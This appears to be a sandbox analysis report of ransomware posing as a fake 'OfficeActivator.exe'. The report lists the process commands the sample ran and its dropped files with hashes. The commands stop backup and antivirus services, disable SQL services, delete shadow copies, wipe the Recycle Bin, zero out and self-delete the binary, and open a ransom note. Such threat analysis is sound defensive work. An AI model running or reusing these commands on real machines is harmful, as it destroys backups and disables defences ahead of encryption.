C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentBrowser /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecVSSProvider /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop AcrSch2Svc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop CAARCUpdateSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop sophos /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecManagementService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecRPCService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop CASAD2DWebSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop PDVFSService /y

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\OfficeActivator.exe

C:\Windows\system32\PING.EXE

ping 127.0.0.7 -n 3

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=524288 “%s”

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\SYSTEM32\net.exe

"net.exe" stop avpsus /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop McAfeeDLPAgentService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop mfewc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BMR Boot Service /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop NetBackup BMR MTFTP Service /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop DefWatch /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop ccEvtMgr /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop ccSetMgr /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop SavRoam /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop RTVscan /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBFCService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBIDPService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop Intuit.QuickBooks.FCS /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBCFMonitorService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop YooBackup /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop YooIT /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop zhudongfangyu /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop stc_raw_agent /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VSNAPVSS /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamTransportSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamDeploymentService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamNFSSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop veeam /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop PDVFSService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecVSSProvider /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecAgentAccelerator /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecAgentBrowser /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecDiveciMediaService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecJobEngine /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecManagementService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecRPCService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop AcrSch2Svc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop AcronisAgent /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop CASAD2DWebSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop CAARCUpdateSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop sophos /y

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLTELEMETRY start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLWriter start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SstpSvc start= disabled

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mspub.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopqos.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopservice.exe /F

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" Delete Shadows /all /quiet

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" Delete Shadows /all /quiet

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BMR Boot Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop McAfeeDLPAgentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mfewc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop ccEvtMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop ccSetMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop avpsus /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBFCService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBIDPService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop DefWatch /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SavRoam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop YooBackup /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop YooIT /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop CAARCUpdateSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop AcrSch2Svc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamNFSSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecVSSProvider /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop PDVFSService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop stc_raw_agent /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop zhudongfangyu /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VSNAPVSS /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop RTVscan /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentBrowser /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop veeam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop CASAD2DWebSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecJobEngine /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamTransportSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBCFMonitorService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop sophos /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamDeploymentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecManagementService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop AcronisAgent /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecRPCService /y

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\OfficeActivator.exe

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=524288 “%s”

C:\Windows\system32\PING.EXE

ping 127.0.0.7 -n 3

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

Network


Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

\??\pipe\LOCAL\crashpad_4640_DPOTZRBQDYUULRHE

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\CURRENT

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 95596a28a2c122816f4b90f1134c90f9
SHA1 70a739ea3f46a79ca4f8f8a2e05d7e99fb29d158
SHA256 4e79c22a4db661db5bb91845d24fe777ab56e59a37dcefe0e97213bcfcc40065
SHA512 ca6ab71bb88ec101c3042bf4e3f415870570175e9e876042a343a39ef61ba9413d76d099abb6cbbc728412ef8e2b99dcf0bede86e5a92cc63d48f03a0986eabe

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e043448fe7cf84d6152554dfdd644fc6
SHA1 b63959fa66fd945143f175ea6457159dd78351b8
SHA256 1c43d4f3ef5896156ff9455398bd902a5509b8b52bbcef3b8bf7d62b8b39042c
SHA512 a6c42678c7f48b05f7c3d78b9aa5fde7347f1455ae215563af837483d5665d84469e85def182db3d6e0960e4c8fb363f4cc3927a2fdfca18b26e17e5d187974f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 282b1aa412b294f1068c5d649063cf08
SHA1 62ef016c6d02db2f9c873ac9f94afe4e5b6ec73d
SHA256 7ac2edce91a202a936481d7c71729c682bbdcfbd21f7d16da05a90db24bbb9de
SHA512 be53d21343b6ad1145dd98cd0ceaf92355be3bb7a81fe95abe5864e6aae3231acb8263a6d2548c169bacfc56ec2b1cae1b9f522076ea48f8e15362caecb08cf3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 5a55984a566a8b8279b4efbf1b1f3849
SHA1 e7a188eee0a70453172fdcebb43a14735a97438a
SHA256 f6bca04364595aa1b95fc152db50c2f58f72c8d336649a60fc1800a235c2f65e
SHA512 ff59dce272d10b2f5a75b745cdd6a9a52a12a5ae87eb99134eddb4bf68405ba74466e3fbfc6a9bb52116ba8aa4a14beeae0691c3f6b375f2ff79889e609025e0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57ddcd.TMP

MD5 07442de914ae8daa9f823ab79ee07c13
SHA1 7cd2ce125e0a297ce2258d90c5ce8f29da578628
SHA256 c144087003433560daad9bd06e64d38b30b67fa95a01a41fc92c0a767ff3d8d3
SHA512 3250fb0f246cfee83b5800b514a3057ccfe3b5ecd46e616e6c43a8d4391c615946ddcf1667bcdbf15ce349de73166c0046a101eaae01b73e3ee7c50c3ea82c96

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ed54d6a7ac9cd9f067236f41ddd8aca9
SHA1 387b716e05a68a01ac294b046133885883b7959c
SHA256 3f52b2e6c4f32af738ac5287142a1939be79e3baa3e952b249ba37ceecc40dfb
SHA512 7edc0b6a62a069eef21c0ab5158e424581dc2914cfb4d45e234fff75d57924e7df25d2a3bc33dadcdfc8cd48803abc243a54b5956da899069ff7a5b52b43ba45

C:\Users\Admin\Downloads\OfficeActivator.exe

MD5 1b4e57be75e855e54e84f55874782d4b
SHA1 f5f17bae63faad537233bb38647940bda7340b2c
SHA256 8441f92e8460a7b2ed37ee96affe547a65589b2e8e980a18a6b08b786b48465d
SHA512 076245019b439583d4a45e46e6c836a2724270aba0a6e1b04e20c4157bdb32533045ee118c22a013e6f7127f1d34eb8b82738156dd152dae7c4ef9da1cf39da9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 a6bee2fb2f9ded51b48962a72bf0d940
SHA1 c796d46ff64bf0b39bd4acbe7342d52199539f0e
SHA256 82e3963f94d3be9ee396084fe5a2ed22f2dd2d41968aa92158b7d27f0da98e77
SHA512 6b0f1ab2d7704c8632b15314884d63b2c46601768ad5cf07f940961545a91e0298d78c25b275ca6738526aa5994e3c43a509aba2d3912fcad0ba5767e9c2d194

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 363c0e8450c81fe5be76e5934906ae36
SHA1 0f092c7c45e6983dacdf0196050dae84d68e269e
SHA256 9fd27cc7c8ad13bd1e0bdf0d5fcab75f4804f48a5367daa60d78aa2b26769034
SHA512 d28ea8447bdd0191aa0880b0d4d23f7774ba38f5536a241dbbf3d0533b2e1ab621881f73290d7201e911082d38a8e740cea7843db1fe412913d3307a7ce32397

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58170d.TMP

MD5 fa41970eceb5b7c8d21af2d2a5b4b561
SHA1 202c49d31973fd3d31c022bf45275d2c385f00fe
SHA256 0b23f145c5ff868f6f22a88fd0d602d956022e7a8cd3527bb193afff424881ca
SHA512 cc66e7888806216e2e2e5c87e9cdebf2a696835c7fe6beed38164c5cc13b04527df35da8a09b7a7e62535b72a1679cb3c8025a9170878a6ac4dfe2736027b047

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 eb4a42a14fef92c3acd66d98d8da545a
SHA1 5cefd1bbf574c0a5aa621454780298509147f54f
SHA256 14892dd8515f397565892526cd61e784af31aac4fd93fef929d97889809e46a5
SHA512 eaed57e8c7ee6a896462433b1f5de6f1a2b6792d7626f310e8efa9589277427c4bef6fa7b7c0eb31a67762557bb1b6236e3dbef825166de957c65b198e17a7c2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 d933556eb8f3bb05d3c2b8ab5ba7612f
SHA1 491c1e7a15008ed27352900e7fd61158c7474a97
SHA256 14947edd5b81b0fbda9339a0a2ef9fc2e5a026aea59c17f84be3b0ebd0e7f814
SHA512 4fafd51c98ea651eeba6d12e595c9d425b34d5e69b72577e51f2edab407f2153d22f1f0ad58c5c88788b45e4a885d75dfab994f39870acab45550cbf246e2d49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 028a7e1de387c9199154a614c812bc06
SHA1 318eaab49db228dc2819a749039da6eeb05ac068
SHA256 e8786afbc551d05a65551b8ce4a159175eeade5fe9ca8f072e1ced135ecf536a
SHA512 05efd21e7d49f6b6d867df89e51342a2293686d60141a8eaf6adec951284df2135dcbfd6b70a90678bcd9c111ae7bd3576507d1102c7d6298d09e32290050c5e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\2463a69e-ce05-4ad0-b311-eb4722bbdb99.tmp

MD5 c5647520dc84526a1c0906ab1a362c40
SHA1 0a8f403a216426eeccf70e75e2a16c2b3dbda0bb
SHA256 86d553b1208bab41df1e0eaf378250af77099632293ba143a2d059042dac68c0
SHA512 5dab4b7ef40c4d9d2de7da744a7fa82f156661efbb6a49c3fe9811e4f0771764260527aa2db181e9c068b6abdc32cbc113e41770987735f4036aacdb07b3e000

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 6b2b91e7953b719cf84646529a822c6f
SHA1 27f00206939a5441b1fd5ecbadbd525755cd2659
SHA256 03633ed293eb831a9bb9fb524846d138a8609508496e8a14fc8e128bf46151a1
SHA512 925c5b8a33f06cb56429bd923423987eb69c929dc099fc9f0f0edfb68cb77dc5ceb030678d8be2847060918924a265f7e4330b107c2e98da626d80ee6aa3206b

memory/1676-464-0x0000000000870000-0x000000000088A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0i24erb4.pb4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5156-470-0x000002B325380000-0x000002B3253A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ztqbqpbr.exe

MD5 b1dfb4f9eb3e598d1892a3bd3a92f079
SHA1 0fc135b131d0bb47c9a0aaf02490701303b76d3b
SHA256 ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb
SHA512 98454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

MD5 1abdf83963ae454a026008f34689a52e
SHA1 8e266c755d1ba08d864c8c5c9fcdcce40cc11cb0
SHA256 3697dfaf54d1065d5dafbb73ad3827f4e75faeb553495921528c93f65dd18979
SHA512 1c6f488566ad1df7d4ee0da28519afbca4556a2a0759d477c9affb0075a6919a378baeaa0699ff5f890d8fe33af2e1ac80179719957f6e7bb13cb1d0f5593224

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

MD5 d7471ba252ed7932174acec020112a56
SHA1 ed318a337230b78baa8496485cdd9f9e98cdf4a6
SHA256 e412c0093803d26c52b8149a043902c8f2ee05bb7a2d07b0f0b9017aa64d70ed
SHA512 80c8d61f4a21beefd55e696ac61d26b409d253d379dd5ca7406f80422e8dd817af7f0782674957f63514b4e86c2f9e6ed92a3a687b847ef48fe539e4cfacdd7b

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\OfficeActivator.exe.log

MD5 baf55b95da4a601229647f25dad12878
SHA1 abc16954ebfd213733c4493fc1910164d825cac8
SHA256 ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924
SHA512 24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

C:\Users\Admin\AppData\Local\Temp\HOW_TO_DECYPHER_FILES.txt

MD5 e9eb3a155118e6c03e4e754d745eb2d8
SHA1 9ba57dfada739c057e5734310a5c4d1516eeb7e9
SHA256 f35fadcf3e807fe29b15092060c4499e0ab0ca5c888e7888847d603a4a64fe99
SHA512 f407e46f6dfb8757cd026c76d1e4129a6b6b6d04afe3412e470931d731d32300aae5ac5d2bcbb2a6209d2aed78353ea6cbb38707bcff40b537e388634077b94b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk

MD5 d717a5921753b2b308ac23a86db9fd25
SHA1 f24623960772a86aa47cc8eaaca1c23ad9f20bc1
SHA256 9b9a8caa58197e3709a0811b92ca312378fcb755e6cc1707b4f53d8c1ca95929
SHA512 0a557f861a97a964c14fa76de4b1120d54cbd5f6db0c5a672fc59d4a7ee864d6c532a2d771d234c7e6320f266bfc7f72457f4141aaf0bcd91befb75623354259

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

MD5 6781ac6cfd7c82f4ee7c1f3c5785c565
SHA1 b523ec6d2588eba58ec7b084bc46561d43c3c157
SHA256 58eb76fc7ff697302e82adccc59811a739ee2ef999ec034e4f761390ba81bf9c
SHA512 538a79497005b4173bd09e7d29c896ec244c1a6c3194c9af23737b75c3a285e04b748d0a049225ad50fed43d1e21246f279eb8cebb4e686eee78ddb33b763c76

C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\HOW_TO_DECYPHER_FILES.txt

MD5 f0cfddce754a35e52dc4c0ed0eaca07e
SHA1 1acfd52bda6df1ae258fd408c7f3fd627af0ffb8
SHA256 e89ef91610e81b1dc16c04bbae9b65c8dfaaa1b1756f4fe9755483ed95b576ae
SHA512 f928420ba7a51126be9723c3ab62a98a7a3c7c6b8c9fec291cd65491203f37cccb707ee78dd42ec82db8e3cbd64701113a66de7e471c5bb42eb7e95bd6946262

C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\HOW_TO_DECYPHER_FILES.txt

MD5 bda99dc37896638504a482323b315069
SHA1 274774d9026553980de89273bac43e438555c3bf
SHA256 726bc80aeb7dba825e13df848b05cf73397094b0c526f912c78dfb0f3e0fb714
SHA512 6ddd1417b7bed451ded6814945d09e676b5b889ae51c6334e9b3596b558b62a24c64e8cc78491e9f6dfa85f83746b5042d4ca90ac991a397ff9b0fb6d898f021

C:\Users\Admin\AppData\Local\Temp\fu025osp.exe

MD5 3e0a2f96bc02b82231e877553e444bd5
SHA1 3a673de3878e3af6914fe47cf0413ec72b8b7f89
SHA256 18118e97f1a328f5a68f3a200e9db1ea6c1f225d025cd06afa4662f1aac4e96c
SHA512 acc53f6c8c467a63f53afae02386171fb8d5474728059dfed48f759f81cfa4e385c3ebaed453abaf8841fef76e53e3a247f99db021a98babafcfec0aa357d97a